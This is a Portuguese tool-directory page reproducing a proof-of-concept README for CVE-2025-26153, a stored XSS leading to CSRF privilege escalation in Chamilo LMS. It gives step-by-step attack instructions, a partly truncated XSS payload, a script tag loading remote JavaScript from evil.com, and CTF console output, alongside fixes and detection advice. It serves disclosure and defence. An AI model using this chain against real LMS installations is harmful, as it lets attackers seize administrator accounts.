Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CSRF-via-stored-XSS-for-PrivEsc — Chamilo-LMS (v2.0) CVE-2025-26153 | Kitploit
Ferramentas/GitHubGitHub/mexeck88/csrf-via-stored-xss-for-privesc
Ferramentas de PhishingEscalada de PrivilégiosExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubmexeck88/csrf-via-stored-xss-for-privesc

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CSRF-via-stored-XSS-for-PrivEsc

Chamilo-LMS (v2.0) CVE-2025-26153

Ver RepositórioSite
5há 7 mesesAinda não revisado

Chamilo LMS (<= v2.0) - POC de XSS Armazenado para Escalada de Privilégios [CVE-2025-26153]

Visão Geral

Este repositório contém uma prova de conceito demonstrando uma vulnerabilidade de cross-site scripting (XSS) armazenado no Chamilo LMS que pode ser explorada para obter escalada de privilégios de um usuário comum para administrador da plataforma. Esta vulnerabilidade está indexada e corrigida: https://nvd.nist.gov/vuln/detail/CVE-2025-26153

Detalhes da Vulnerabilidade

Informações do CVE

  • Aplicação: Chamilo LMS <= v2.0
  • Tipo de Vulnerabilidade: XSS armazenado levando à Escalada de Privilégios

Detalhes Técnicos

Locais do Código Vulnerável:

  1. /public/main/forum/forumqualify.php - Linha 277

    root@kitploit:~
    $form->addLabel(get_lang('Thread'), $threadEntity->getTitle());
    
  2. /public/main/forum/viewforum.php - Linha 369

    root@kitploit:~
    .$thread->getTitle().'</a>';
    
  3. Há mais!

Causa Raiz:

  • Os títulos dos tópicos do fórum são armazenados sem sanitização adequada
  • Os títulos dos tópicos são exibidos sem escape de HTML em vários locais
  • Não há Política de Segurança de Conteúdo (CSP) impedindo a execução de XSS

Guia Passo a Passo de Escalada de Privilégios

Fase 1: Coleta de Dados

Passo 1: Coletar Informações do Usuário Alvo

  1. Faça login no Chamilo LMS
  2. Navegue até Rede Social -> Dados Pessoais
  3. Abra user_info e anote as seguintes informações:
    • ID do usuário
    • Nome de usuário
    • Nome
    • Sobrenome
    • Endereço de e-mail

Passo 2: Gerar Payload Personalizado

  1. Execute o gerador de payload:
    root@kitploit:~
    python generate_payload.py
    
  2. Insira o ID do usuário alvo do Passo 1
  3. Insira as informações de descrição que você não deseja alterar (ou especifique novos valores)
  4. O script gerará um arquivo payload.js personalizado

Passo 3: Hospedar Payload Externamente

  1. Carregue o payload.js gerado para um serviço de hospedagem público:
    • GitHub Gist (recomendado)
    • GitHub Pages
    • Seu próprio servidor web
  2. Anote a URL direta para o arquivo de payload

Fase 2: Injeção e Execução de XSS

Passo 4: Acessar Grupos Sociais

  1. Faça login no Chamilo LMS (pode ser com qualquer conta de usuário)
  2. Navegue até Rede Social -> Grupos sociais

Passo 5: Entrar ou Criar Grupo Social

  1. Entre em um grupo social existente ou
  2. Crie um novo grupo social, se necessário

Passo 6: Implantar Payload de XSS

  1. Crie um novo tópico no grupo social
  2. No campo de título do tópico, insira o seguinte payload de XSS:
    root@kitploit:~
    eval(x.responseText);x.send()">
    
  3. Substitua YOUR-HOST-SERVER pela sua URL de hospedagem real
  4. Envie o tópico

Passo 7: Acionar a Escalada de Privilégios

  1. Aguarde um usuário com privilégios de administrador visualizar o grupo social
  2. Quando o administrador visualizar o tópico malicioso, o payload de XSS é executado automaticamente em segundo plano
  3. A escalada de privilégios NÃO ocorre silenciosamente - o administrador será redirecionado para a lista de usuários
  4. O usuário alvo especificado será promovido a administrador da plataforma sem nenhuma indicação visível

Fase 3: Verificação

Passo 8: Confirmar a Escalada de Privilégios

  1. Faça login como o usuário alvo
  2. Verifique se os privilégios de administrador foram concedidos
  3. Confirme o acesso às funções administrativas

Uso do Gerador de Payload

O script generate_payload.py permite personalizar o ataque de escalada de privilégios:

Parâmetros de Entrada:

  • ID do usuário alvo
  • Novo nome de usuário
  • Nova senha (opcional)
  • Código oficial
  • Endereço de e-mail
  • Nome, sobrenome, telefone (opcional)

Exemplo de Fluxo de Ataque

root@kitploit:~
1. Attacker creates malicious forum thread
   └── Title: <script src=//evil.com/payload.js></script>

2. Admin user browses forum and views thread
   └── Browser loads and executes external JavaScript

3. Payload creates hidden form with privilege escalation data
   └── Targets specific User ID for promotion to admin

4. Form auto-submits via CSRF attack
   └── Uses admin's session cookies automatically

5. Target user becomes platform administrator
   └── Attacker gains full platform control

Estratégias de Mitigação

Correções Imediatas

  1. Sanitização de Entrada

    root@kitploit:~
    // Before
    $threadEntity->getTitle()
    
    // After  
    htmlspecialchars($threadEntity->getTitle(), ENT_QUOTES, 'UTF-8')
    
  2. Codificação de Saída

    root@kitploit:~
    <!-- Before -->
    {{ thread.title }}
    
    <!-- After -->
    {{ thread.title|escape }}
    
  3. Política de Segurança de Conteúdo

    root@kitploit:~
    Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none';
    

Soluções de Longo Prazo

  • Implementar um framework abrangente de validação de entrada
  • Revisões regulares de segurança no código
  • Testes automatizados de segurança no pipeline de CI/CD
  • Treinamento de segurança para a equipe de desenvolvimento

Detecção e Monitoramento

Análise de Logs

Monitore:

  • Criações/modificações incomuns de usuários administradores
  • Títulos suspeitos de tópicos do fórum contendo HTML/JavaScript
  • Carregamento de scripts externos a partir de domínios não confiáveis

Aviso Legal

AVISO LEGAL IMPORTANTE

Esta prova de conceito é fornecida apenas para fins educacionais e de testes de segurança autorizados.

  • Use apenas contra sistemas que você possui ou para os quais tenha permissão explícita por escrito para testar
  • O acesso não autorizado a sistemas de computador é ilegal na maioria das jurisdições
  • Esta pesquisa tem como objetivo ajudar organizações a melhorar sua postura de segurança
  • Os autores não são responsáveis por qualquer uso indevido destas informações

Créditos da Pesquisa

Descoberta e Análise: US Cyber Combine

Ambiente de Teste: USCG CTF Environment

Saída do Console do Ataque Bem-sucedido:

root@kitploit:~
XSS Payload loaded successfully!
Target User ID: 9
Current location: http://cve-hunting.ctf.uscybergames.com:8000/resources/usergroups/show/5
Form created with action: http://cve-hunting.ctf.uscybergames.com:8000/main/admin/user_edit.php?user_id=9
Submitting privilege escalation form for user_id 9
Form has 66 fields
Form submission triggered!
Fetch response status: 200

Baixar ferramenta